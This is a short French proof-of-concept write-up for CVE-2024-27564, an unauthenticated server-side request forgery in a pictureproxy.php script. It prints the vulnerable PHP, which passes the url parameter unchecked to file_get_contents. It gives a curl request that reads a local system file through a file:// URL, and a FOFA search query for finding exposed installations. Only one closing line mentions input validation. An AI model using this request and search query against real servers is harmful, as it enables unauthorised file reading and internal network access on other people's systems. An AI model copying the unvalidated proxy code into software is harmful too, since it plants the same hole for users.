
Exploit de preuve de concept pour CVE-2024-27564, une vulnérabilité de type forgerie de requête côté serveur (SSRF) dans pictureproxy.php permettant à des attaquants distants non authentifiés d'injecter des URL arbitraires via le paramètre url.
Une vulnérabilité dans pictureproxy.php permet à des attaquants distants d'effectuer des requêtes arbitraires en injectant des URLs dans le paramètre url. Cette vulnérabilité SSRF peut être exploitée sans authentification, ce qui la rend particulièrement dangereuse.
Le code vulnérable se trouve dans le fichier pictureproxy.php. Le problème survient car la fonction ne valide pas correctement le paramètre url. La variable $_GET['url'] est passée à la fonction file_get_contents(), qui récupère le contenu à partir de l'URL spécifiée. Cela peut mener à une SSRF.
<?php
if (isset($_GET['url'])) {
$image = file_get_contents($_GET['url']);
header("Content-type: image/jpeg");
echo $image;
} else {
echo "Invalid request";
}
Requête Curl:
curl -i -s -k http://127.0.0.1/pictureproxy.php?url=file:///etc/password
FOFA= "title="ChatGPT个人专用版""
Une gestion appropriée de la validation des entrées est nécessaire.